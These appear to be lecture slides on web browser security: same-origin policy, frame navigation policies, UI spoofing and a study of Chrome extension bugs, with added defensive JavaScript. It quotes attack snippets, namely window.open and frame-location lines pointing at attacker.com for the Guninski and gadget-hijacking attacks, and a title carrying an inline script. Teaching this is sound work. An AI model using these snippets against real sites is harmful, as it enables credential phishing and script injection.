CSC 495/583 Topics of Software Security: Web Browser Security (2), Class 16. Dr. Si Chen (schen@wcupa.edu)
Internet Explorer Logical Components
Chrome Logical Components
Edge Logical Components
Web Technologies supported by Browsers
Google Chrome Bug Bounty Rewards
Review: UI Spoof
THE LINE OF DEATH (LoD). In web browsers, the browser itself usually fully controls the top of the window, while the pixels under the top are under the control of the site. If a user trusts pixels above the line of death, the thinking goes, they'll be safe, but if they can be convinced to trust the pixels below the line, they're gonna die.
Zone of Death The bigger problem is that some attacker data is allowed above the LoD; while trusting the content below the LoD will kill your security, there are also areas of death above the line. A more accurate Zones of Death map might look like this:
CVE-2017-5072 RTL character in URL flips domain and path (Android 4.2 and earlier)
Status Bar Spoofing
Document Object Model (DOM)
Data structure manipulated by JavaScript; a web page in HTML is structured data, and the DOM provides a representation of this hierarchy.
Examples
  Properties: document.alinkColor, document.URL, document.forms[ ], document.links[ ], document.anchors[ ]
  Methods: document.write(document.referrer)
Also the Browser Object Model (BOM): Window, Document, Frames[], History, Location, Navigator (type and version of browser)
Browser and document tree structure W3C standard differs from models supported in existing browsers
Components of browser security policy
Components of browser security policy
Frame-Frame relationships
  canScript(A,B): Can Frame A execute a script that manipulates arbitrary/nontrivial DOM elements of Frame B?
  canNavigate(A,B): Can Frame A change the origin of content for Frame B?
Frame-principal relationships
  readCookie(A,S), writeCookie(A,S): Can Frame A read/write cookies from site S?
Security indicator (lock icon)
  securityIndicator(W): Is the security indicator displayed for window W?
Generally misunderstood
Often simply stated as “same origin policy”; this usually just refers to the canScript relation.
The full policy of current browsers is complex: it evolved via “penetrate-and-patch”, and different features evolved slightly different policies.
Common scripting and cookie policies:
  canScript considers: scheme, host, and port
  canReadCookie considers: scheme, host, and path
  canWriteCookie considers: host
Cross-frame scripting
canScript(A,B) only if Origin(A) = Origin(B), where the origin of a frame is the scheme, host, and network port from which it was loaded.
This is the basic Same-Origin Policy (SOP).
Some details: some properties can be read anyway. Example: A can read the size of B if A is the parent of B in the DOM hierarchy.
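The three relations above (canScript on scheme/host/port, canReadCookie on scheme/host/path, canWriteCookie on host) as a runnable model. This is an added example, not code from the slides; it is deliberately simplified and ignores document.domain, the cookie Domain attribute and public-suffix rules that real browsers apply.

```javascript
// Added example (not from the lecture slides): a simplified model of the
// relations the slides name. Real browsers add many special cases
// (document.domain, the cookie Domain attribute, public suffixes).

// Origin = (scheme, host, port). WHATWG URL parsing drops default ports,
// so "https://a.com:443/" and "https://a.com/" compare equal.
function origin(frameUrl) {
  const u = new URL(frameUrl);
  return `${u.protocol}//${u.host}`; // u.host keeps a non-default port
}

// canScript(A, B): the basic same-origin policy.
function canScript(frameA, frameB) {
  return origin(frameA) === origin(frameB);
}

// RFC 6265 path-match: "/account" matches "/account" and "/account/x",
// but not "/accounting".
function pathMatches(requestPath, cookiePath) {
  if (requestPath === cookiePath) return true;
  if (!requestPath.startsWith(cookiePath)) return false;
  return cookiePath.endsWith("/") || requestPath[cookiePath.length] === "/";
}

// canReadCookie(A, S): scheme (via the Secure flag), host, and path.
function canReadCookie(frameA, cookie) {
  const u = new URL(frameA);
  if (cookie.secure && u.protocol !== "https:") return false;
  if (u.hostname !== cookie.host) return false;
  return pathMatches(u.pathname, cookie.path);
}

// canWriteCookie(A, S): host only, as on the slide. In this model a plain-http
// page on the same host can therefore set a cookie that https pages read.
function canWriteCookie(frameA, cookie) {
  return new URL(frameA).hostname === cookie.host;
}

// Constructed sample: a Secure session cookie scoped to /account.
const sessionCookie = { host: "www.example.com", path: "/account", secure: true };
```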
Cross-Frame Navigation
Who decides a frame's content?
Permissive Policy: a frame can navigate any frame. Used in some browsers; not a great idea.
Guninski Attack
  Frame name: awglogin
  window.open("https://www.attacker.com/...", "awglogin")
  window.open("https://www.google.com/...")
If the bad frame can navigate the good frame, the attacker gets the password.
Window Policy: a frame can navigate frames in its own window.
Gadget Hijacking
  top.frames[1].location = "http://www.attacker.com/...";
  top.frames[2].location = "http://www.attacker.com/...";
  ...
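canNavigate(A,B) under the permissive and window policies, checked against the Guninski scenario and the gadget-mashup layout above. Added example, not code from the slides; apart from the frame name "awglogin", the frame names, window ids and origins are constructed.

```javascript
// Added example (not from the slides): the two navigation policies named
// above. Frame names other than "awglogin", window ids and origins are
// constructed for illustration.

// Each frame records the top-level window it lives in and its origin.
const frames = {
  attackerPage: { window: "W1", origin: "https://www.attacker.com" },
  googleLogin:  { window: "W2", origin: "https://www.google.com" },
  awglogin:     { window: "W2", origin: "https://www.google.com" }, // login frame
  mashupTop:    { window: "W3", origin: "https://mashup.example" },
  gadget1:      { window: "W3", origin: "https://bank.example" },
  gadget2:      { window: "W3", origin: "https://www.attacker.com" }, // evil gadget
};

function canNavigate(policy, a, b) {
  // permissive: any frame may navigate any frame (Guninski attack works)
  if (policy === "permissive") return true;
  // window: only frames in the same top-level window (gadget hijacking still works)
  if (policy === "window") return frames[a].window === frames[b].window;
  throw new Error(`unknown policy ${policy}`);
}

// Models window.open(url, name): if a frame with that name exists and the
// policy allows it, that frame is navigated; otherwise a fresh window opens
// and the existing frame keeps its content.
function openNamed(policy, from, name, url) {
  const target = frames[name];
  const newOrigin = new URL(url).origin;
  if (target !== undefined && canNavigate(policy, from, name)) {
    return { navigated: name, origin: newOrigin };
  }
  return { navigated: null, origin: newOrigin };
}
```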
Gadget Hijacking
Browser Extensions
Web Extension Architecture Overview. A Web Extension is structured much like an HTML website, with folders holding their respective files. The extension file itself is nothing but a compressed folder structure containing HTML, JavaScript, CSS, images, audio, and so on.
CHROME EXTENSIONS
WEB ATTACKER [Diagram: threat model with servers, a client-side website, an extension, and the browser API (history, bookmarks); the attacker controls a website.]
NETWORK ATTACKER [Diagram: the same components (servers, client-side website, extension, browser API with history and bookmarks) with a network attacker.]
CHROME’S SECURITY MECHANISMS
PRIVILEGE SEPARATION [Diagram: the extension is split into a content script and a core extension; only the core extension reaches the browser API (history, bookmarks).]
ISOLATED WORLDS [Diagram: each client-side website gets its own content script, separated from the website's own scripts and from the core extension.]
PERMISSIONS [Diagram: the core extension's access to servers and to the browser API (history, bookmarks) is limited by the permissions it declares.]
FINDING BUGS
  Sample: 50 most popular + 50 random extensions
  Methods: black-box testing + source code analysis
  Verification: built exploits to confirm the vulnerabilities
VULNERABLE EXTENSIONS
  Popular: 22
  Random: 18
  Total: 40
EXAMPLE: SPEED DIAL. The Speeddial extension replicates Chrome's built-in list of recently closed pages. Speeddial keeps track of the tabs opened using the tabs manager and does not sanitize the titles of these pages before adding them to the HTML of one of its core extension pages. If a title were to contain an inline script, it would execute with the core extension's permissions.
ISOLATED WORLDS
Need for isolation. If Googkle can script other windows, then it can steal passwords, post fraudulent bank or retail transactions, etc.
Need for isolation - mashups
Need for isolation - advertisements
Vulnerability count: 3 content script vulns
DATA AS HTML
  Mistake: insert data as HTML, where it can execute.
  Mitigation: it will execute in the website's isolated world.
  Vulnerabilities: 6 extensions have data-as-HTML bugs that don't cause content script vulnerabilities.
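The data-as-HTML mistake, in the shape of the Speed Dial example above: a recently-closed list built by concatenating tab titles into markup, beside a rendering that escapes text and validates URLs first. Added example, not Speeddial's real code; the tab list is constructed.

```javascript
// Added example (not Speeddial's real code): untrusted tab titles inserted
// as HTML, and the corrected rendering. The closed-tab list is constructed.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Only http(s) URLs may go into an href; anything else (javascript:, data:) is dropped.
function safeHref(url) {
  try {
    const u = new URL(url);
    return u.protocol === "http:" || u.protocol === "https:" ? u.href : "#";
  } catch {
    return "#";
  }
}

// MISTAKE: page titles are chosen by whatever site the user visited, yet they
// are concatenated straight into the core extension page's HTML.
function renderRecentlyClosedUnsafe(tabs) {
  return tabs.map((t) => `<li><a href="${t.url}">${t.title}</a></li>`).join("\n");
}

// FIX: escape text and validate URLs before they become markup. In a live
// page, building nodes with createElement/textContent avoids the issue entirely.
function renderRecentlyClosedSafe(tabs) {
  return tabs
    .map((t) => `<li><a href="${safeHref(t.url)}">${escapeHtml(t.title)}</a></li>`)
    .join("\n");
}

// Crude check used by the test: would the markup introduce a live <script> element?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Constructed closed-tab list; the second title carries an inline script.
const closedTabs = [
  { url: "https://www.wcupa.edu/", title: "West Chester University" },
  { url: "https://example.com/deals", title: "Deals <script>x()</script>" },
];
```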
EVAL
  Mistake: use eval to execute untrusted data.
  Mitigation: isolated worlds does not mitigate this bug.
  Vulnerabilities: 2 vulnerabilities due to this mistake.
CLICK INJECTION
  Mistake: trusting event handlers on a website.
  Mitigation: isolated worlds does not mitigate this bug.
  Vulnerabilities: 1 vulnerability due to this mistake.
Isolated worlds is highly effective because it mitigates common bugs
PRIVILEGE SEPARATION
Privilege separation: protect core extensions
PRIVILEGE SEPARATION [Diagram: client-side website, content script, core extension, and the browser API (history, bookmarks); only the core extension holds API access.]
Vulnerability count: 50 core extension vulns
METADATA ATTACK [Diagram: data flows from servers and the client-side website through the content script into the core extension, which holds the browser API (history, bookmarks).]
HTTP SCRIPTS/XHRS [Diagram: the core extension and content script fetching scripts and XHR responses from servers over HTTP, alongside the client-side website and the browser API (history, bookmarks).]
PERMISSIONS
JavaScript Security Model
“Sandbox” design: no direct file access, restricted network access.
Same-origin policy: a frame can only read properties of documents and windows from the same place: server, protocol, port.
However, this does not apply to a script loaded in the enclosing frame from an arbitrary site. This script runs as if it were loaded from the site that provided the page!
  <script type="text/javascript" src="http://www.example.com/scripts/somescript.js"></script>
Reference: http://www.devarticles.com/c/a/JavaScript/JavaScript-Security/
Cross-Origin XMLHttpRequest Regular web pages can use the XMLHttpRequest object to send and receive data from remote servers, but they're limited by the same origin policy. Extensions aren't so limited. An extension can talk to remote servers outside of its origin, as long as it first requests cross-origin permissions.
Permissions: limit the scope of core vulnerabilities
PERMISSION RATE (27 buggy extensions) [Pie chart; labels as extracted: None 15%, Low / High 44% and 11%, Medium 30%.]
Reduces potential for severe attacks by half
RATE COMPARISON (extensions with bugs vs. others) [Two pie charts; labels as extracted: with bugs: None 15%, Low / High 44% and 11%, Medium 30%; others: None 1%, Low 12%, remaining labels lost in extraction.]
No correlation between bugs and permissions
Yes, permissions limit the scope of vulnerabilities